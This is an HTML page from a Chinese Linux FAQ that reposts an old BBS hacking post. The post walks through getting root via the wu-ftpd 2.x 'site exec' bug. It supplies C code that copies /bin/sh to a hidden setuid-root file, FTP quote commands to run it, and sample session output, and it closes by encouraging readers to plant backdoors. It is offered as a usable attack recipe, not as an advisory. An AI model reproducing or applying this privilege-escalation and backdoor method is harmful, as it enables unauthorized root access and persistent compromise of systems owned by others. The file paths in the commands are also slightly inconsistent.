network-ftp-hole.html

来自「学习linux的工具书」· HTML 代码 · 共 79 行

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
   <meta name="Author" content="Edward Fu">
   <meta name="GENERATOR" content="Mozilla/4.05 [zh-CN] (X11; I; Linux 2.1.127 i686) [Netscape]">
   <title>Freesoft Linux FAQ -- 关于wu-ftp老版本的一个bug</title>
</head>
<body>
&nbsp;
<br>如何使用 wu-ftp 2.x (site exec bug) 来取得 root 权限
<br>1.需求:
<br>(1)该主机的 ftpd 使用 wu-ftp 2.x 版本
<br>(2)您必须有该主机的任何一个帐号
<br>2.步骤:
<br>(1)先 telnet login 到主机您的目录下...
<br>(2)使用 cc -o bug bug.c 将下列程序编译...
<p>--&lt; bug.c >-----------------------------
<p>#include
<br>#include
<br>#include
<p>main()
<br>{
<br>seteuid(0);
<br>system("cp /bin/sh /tmp/.sh");
<br>system("chmod 6777 /tmp/.sh");
<br>}
<p>-----------------------------------------
<br>编译成功后会在您的目录下产生 bug 这个文件(别忘了 chmod ...)
<p>(3)使用 ftp login 到该主机下...
<p>220 hackerforce FTP server (Version wu-2.4(1) Sun Jul 31 21:00:15 CDT
1997) ready.
<br>Name (hackerforce:ftp): funky
<br>331 Password required for funky.
<br>Password: (password)
<br>230 User funky logged in.
<br>Remote system type is UNIX.
<br>Using binary mode to transfer files.
<br>ftp> quote "site exec bash -c id" (检查系统是否能利用此 bug)
<br>200-bash -c id
<br>200-uid=0(root) gid=0(root) euid=101(funky) egid=50(users) groups=50(users)
<br>200 (end of 'bash -c id') (一但出现 euid=0 就成功了)
<br>ftp> quote "site exec bash -c /yer/home/dir/ftpbug" (执行您刚编译成功的
bug)
<br>200-bash -c /your/home/dir/bug
<br>200 (end of 'bash -c /your/home/dir/bug')
<br>ftp> quit (离开 ftp)
<br>221 Goodbye.
<p>(4)再 telnet 进去该主机,执行 /tmp/.sh 这个 setuid root shell ...
<p>$ id
<br>uid=101(funky) gid=50(user)
<br>$ /tmp/.sh
<p># id
<br>uid=101(funky) gid=50(user) euid=0(root)
<br>#
<p>恭喜您...到此您就成功的拿到 root 权限了....
<p>3.后记:
<br>由於 wu-ftpd 执行时的 euid 是 root ,所以我们透过这个 hole 来执行执行外部的命令....
<br>当编译完的 bug 一但被执行,便会帮您将 /bin/sh 这个 shell 复制一份到
/tmp/.sh 下,并且
<br>会将 /tmp/.sh setuid ,一但成功后只要任何使用者执行 /tmp/.sh 这个 setuid
shell 就会拥
<br>有 root 的 euid ....
<p>一但您得手后,别忘了帮自己及别人多留些 backdoor... ;-)
<p>弟有感于国内这些 hack 资源实在很有限,以后弟会试着将一些弟曾实作过的技巧及心得
post 出
<br>来,让有兴趣的朋友能很快的进入这个领域,欢迎各位前辈后进,能多多与弟研究,交流.....
<p>funky chen
<br>e-mail:hacker@m2.dj.net.tw
<br>http://w7.dj.net.tw/~hacker
<br>&nbsp;
<p>--
<br>※ 来源:．未来花园 bbs.pubnic.buaa.edu.cn．[FROM: stu21.pubnic.bu]
<p>--------------------------------------------------------------------------------
<br>&nbsp;
<br>&nbsp;
</body>
</html>